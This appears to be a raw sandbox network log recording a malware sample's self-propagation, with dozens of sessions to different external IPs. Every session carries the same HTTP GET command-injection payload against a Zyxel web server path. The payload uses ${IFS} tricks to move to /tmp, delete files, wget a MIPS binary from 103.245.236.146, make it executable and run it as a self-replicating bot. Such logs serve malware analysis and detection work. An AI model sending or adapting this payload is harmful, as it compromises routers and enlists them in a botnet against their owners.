                                                Jan 28, 2024 10:16:11.599216938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                807192.168.2.2342658181.70.94.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.599248886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                808192.168.2.2349306137.243.56.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.599266052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                809192.168.2.23349405.83.237.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.599292994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                810192.168.2.2344434168.201.244.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.599327087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                811192.168.2.235358871.204.237.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.599358082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                812192.168.2.2352892126.215.156.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.599395037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                813192.168.2.233952498.230.187.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.599419117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                814192.168.2.235385247.66.59.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.599445105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                815192.168.2.2346490109.90.151.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.599459887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                816192.168.2.236012036.207.66.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.599479914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                817192.168.2.23521145.128.233.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.599522114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                818192.168.2.233434213.80.94.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.599529982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                819192.168.2.234838290.174.92.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.599586964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                820192.168.2.2351046167.59.84.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.599586964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                821192.168.2.233833063.73.31.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.599620104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                822192.168.2.2347702194.41.140.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.599654913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                823192.168.2.2340444220.219.107.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.599670887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                824192.168.2.2337096120.182.24.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.599673033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                825192.168.2.2347578143.210.192.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.599725962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                826192.168.2.2337994191.208.103.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.599735022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                827192.168.2.234172493.68.101.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.599787951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                828192.168.2.2349216112.218.48.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.599828005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                829192.168.2.2348812160.114.47.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600022078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                830192.168.2.2335290204.34.68.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600040913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                831192.168.2.233758499.96.13.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600069046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                832192.168.2.2339486185.181.234.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600075006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                833192.168.2.2360036106.149.60.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600080013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                834192.168.2.23379229.253.104.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600075006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                835192.168.2.2350218155.81.144.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600089073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                836192.168.2.235929420.180.113.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600099087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                837192.168.2.2335746201.18.107.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600125074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                838192.168.2.2356380168.168.147.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600177050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                839192.168.2.234325248.248.170.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600184917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                840192.168.2.2341954206.47.252.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600241899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                841192.168.2.233617852.59.56.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600272894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                842192.168.2.2333202126.210.88.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600308895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                843192.168.2.2334484157.101.15.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600346088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                844192.168.2.234706846.43.72.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600389004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                845192.168.2.233711895.144.17.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600394011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                846192.168.2.2334536106.32.5.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600402117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                847192.168.2.233339490.196.219.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600411892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                848192.168.2.234154891.201.241.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600450993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                849192.168.2.2353624135.238.195.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600486994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                850192.168.2.234020040.237.90.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600517988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                851192.168.2.235431068.189.206.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600569963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                852192.168.2.233570886.238.151.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600613117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                853192.168.2.234045614.84.125.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600641966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                854192.168.2.2342114181.77.164.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600682974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                855192.168.2.2335886209.215.47.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600716114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                856192.168.2.2335830206.223.0.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600719929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                857192.168.2.2341934132.180.150.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600756884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                858192.168.2.2352008211.176.30.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600800991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                859192.168.2.2356074198.213.2.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600812912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                860192.168.2.235786636.231.99.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600853920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                861192.168.2.233402283.197.178.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600903988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                862192.168.2.235035444.99.195.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600938082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                863192.168.2.235948463.193.171.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.600976944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                864192.168.2.2360230213.186.243.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601010084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                865192.168.2.234081047.83.123.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601017952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                866192.168.2.236081624.84.104.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601044893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                867192.168.2.235094046.79.243.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601078987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                868192.168.2.2351746163.25.66.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601106882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
